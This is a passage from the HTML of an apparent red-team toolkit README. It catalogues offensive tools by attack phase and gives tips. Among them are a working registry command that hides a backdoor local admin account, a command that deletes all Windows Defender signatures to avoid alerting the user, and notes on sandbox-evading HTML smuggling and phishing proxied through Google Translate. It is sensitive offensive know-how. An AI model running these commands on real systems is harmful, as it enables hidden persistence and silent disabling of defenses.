dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crassus\"\u003eCrassus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation discovery tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linpeas\"\u003eLinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#winpeas\"\u003eWinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linux-smart-enumeration\"\u003elinux-smart-enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#certify\"\u003eCertify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory privilege escalation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#get-gpppassword\"\u003eGet-GPPPassword\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows password extraction\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sherlock\"\u003eSherlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#watson\"\u003eWatson\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#impulsivedllhijack\"\u003eImpulsiveDLLHijack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DLL Hijack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfsdump\"\u003eADFSDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e AD FS dump tool\u003c/i\u003e\u003c/li\u003e \n \u003cli\u003e\u003cb\u003e\u003ca href=\"#beroot\"\u003eBeRoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Multi OS Privilege Escalation Project\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eDefense Evasion\u003c/b\u003e 8 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#invoke-obfuscation\"\u003eInvoke-Obfuscation\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Script obfuscator\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#veil\"\u003eVeil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Metasploit payload obfuscator\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpblock\"\u003eSharpBlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e EDR bypass via entry point execution prevention\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#alcatraz\"\u003eAlcatraz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GUI x64 binary obfuscator\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mangle\"\u003eMangle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Compiled executable manipulation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#amsi-fail\"\u003eAMSI Fail\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell snippets that break or disable AMSI\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#scarecrow\"\u003eScareCrow\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation framework designed around EDR bypass\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#moonwalk\"\u003emoonwalk\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux system log and filesystem timestamp remover\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eCredential Access\u003c/b\u003e 11 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mimikatz\"\u003eMimikatz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows credential extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#lazagne\"\u003eLaZagne\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local password extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hashcat\"\u003ehashcat\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#john-the-ripper\"\u003eJohn the Ripper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#scomdecrypt\"\u003eSCOMDecrypt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SCOM Credential Decryption Tool\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#nanodump\"\u003enanodump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LSASS process minidump creation\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#eviltree\"\u003eeviltree\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tree remake for credential discovery\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#seeyoucm-thief\"\u003eSeeYouCM-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cisco phone systems configuration file parsing\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mailsniper\"\u003eMailSniper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Microsoft Exchange Mail Searcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpchromium\"\u003eSharpChromium\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cookie, history and saved login chromium extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#dploot\"\u003edploot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DPAPI looting remotely in Python\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eDiscovery\u003c/b\u003e 6 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pcredz\"\u003ePCredz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Credential discovery PCAP/live interface\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pingcastle\"\u003ePingCastle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory assessor\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#seatbelt\"\u003eSeatbelt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#adrecon\"\u003eADRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory recon\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#adidnsdump\"\u003eadidnsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Integrated DNS dumping\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#scavenger\"\u003escavenger\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Scanning tool for scavenging systems\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eLateral Movement\u003c/b\u003e 12 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crackmapexec\"\u003ecrackmapexec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/Active directory lateral movement toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote commands\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerlessshell\"\u003ePowerLessShell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote PowerShell without PowerShell\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#psexec\"\u003ePsExec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Light-weight telnet-replacement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#liquidsnake\"\u003eLiquidSnake\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fileless lateral movement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enabling-rdp\"\u003eEnabling RDP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows RDP enable command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#upgrading-shell-to-meterpreter\"\u003eUpgrading shell to meterpreter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Reverse shell improvement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#forwarding-ports\"\u003eForwarding Ports\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local port forward command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#jenkins-reverse-shell\"\u003eJenkins reverse shell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Jenkins shell command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfspoof\"\u003eADFSpoof\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Forge AD FS security tokens\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#kerbrute\"\u003ekerbrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e A tool to perform Kerberos pre-auth bruteforcing\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#coercer\"\u003eCoercer\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Coerce a Windows server to authenticate\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote commands\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eCollection\u003c/b\u003e 3 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bloodhound\"\u003eBloodHound\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory visualisation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#snaffler\"\u003eSnaffler\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory credential collector\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linwinpwn\"\u003elinWinPwn\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Enumeration and Vulnerability checks\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eCommand and Control\u003c/b\u003e 9 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#living-off-trusted-sites-project\"\u003eLiving Off Trusted Sites Project\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Leverage legitimate domains for your C2\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#havoc\"\u003eHavoc\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#covenant\"\u003eCovenant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (.NET)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#merlin\"\u003eMerlin\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Golang)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#metasploit-framework\"\u003eMetasploit Framework\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Ruby)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#pupy\"\u003ePupy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Python)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#brute-ratel\"\u003eBrute Ratel\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework ($$$)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#nimplant\"\u003eNimPlant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 implant written in Nim\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hoaxshell\"\u003eHoaxshell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell reverse shell\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eExfiltration\u003c/b\u003e 5 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#dnscat2\"\u003eDnscat2\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 via DNS tunneling\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloakify\"\u003eCloakify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data transformation for exfiltration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pyexfil\"\u003ePyExfil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data exfiltration PoC\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powershell-rat\"\u003ePowershell RAT\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python based backdoor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gd-thief\"\u003eGD-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Google drive exfiltration\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eImpact\u003c/b\u003e 4 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Conti ransomware group affilate toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#slowloris\"\u003eSlowLoris\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Simple denial of service\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#usbkill\"\u003eusbkill\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Anti-forensic kill-switch\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#keytap\"\u003eKeytap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Get pressed keyboard keys from typing audio\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eRed Team Tips\u003c/h1\u003e\u003ca id=\"user-content-red-team-tips\" class=\"anchor\" aria-label=\"Permalink: Red Team Tips\" href=\"#red-team-tips\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eLearn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eImproved HTML smuggling with mouse move eventlistener\u003c/h3\u003e\u003ca id=\"user-content-improved-html-smuggling-with-mouse-move-eventlistener\" class=\"anchor\" aria-label=\"Permalink: 🔙Improved HTML smuggling with mouse move eventlistener\" href=\"#improved-html-smuggling-with-mouse-move-eventlistener\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti evasion in sandbox's the zip wont drop.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://x.com/pr0xylife\" rel=\"nofollow\"\u003e@pr0xylife\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://x.com/pr0xylife/status/1598410732516802563\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eGoogle translate for phishing\u003c/h3\u003e\u003ca id=\"user-content-google-translate-for-phishing\" class=\"anchor\" aria-label=\"Permalink: 🔙Google translate for phishing\" href=\"#google-translate-for-phishing\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003eSuccessful phishing page credential stealing being proxied via the google translate page view functionality.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://x.com/malmoeb\" rel=\"nofollow\"\u003e@malmoeb\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://x.com/malmoeb/status/1671106885590630400\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eHiding the local admin account\u003c/h3\u003e\u003ca id=\"user-content-hiding-the-local-admin-account\" class=\"anchor\" aria-label=\"Permalink: 🔙Hiding the local admin account\" href=\"#hiding-the-local-admin-account\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg add \u0026quot;HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\u0026quot; /t REG_DWORD /v alh4zr3d /d 0 /f\"\u003e\u003cpre\u003ereg add \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e /t REG_DWORD /v alh4zr3d /d 0 /f\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1612913838999113728\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCripple windows defender by deleting signatures\u003c/h3\u003e\u003ca id=\"user-content-cripple-windows-defender-by-deleting-signatures\" class=\"anchor\" aria-label=\"Permalink: 🔙Cripple windows defender by deleting signatures\" href=\"#cripple-windows-defender-by-deleting-signatures\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"\u0026quot;%Program Files%\\Windows Defender\\MpCmdRun.exe\u0026quot; -RemoveDefinitions -All\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e%Program Files%\\Windows Defender\\MpCmdRun.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -RemoveDefinitions -All\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1611005101262389250\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eEnable multiple RDP sessions per user\u003c/h3\u003e\u003ca id=\"user-content-enable-multiple-rdp-sessions-per-user\" class=\"anchor\" aria-label=\"Permalink: 🔙Enable multiple RDP sessions per user\" 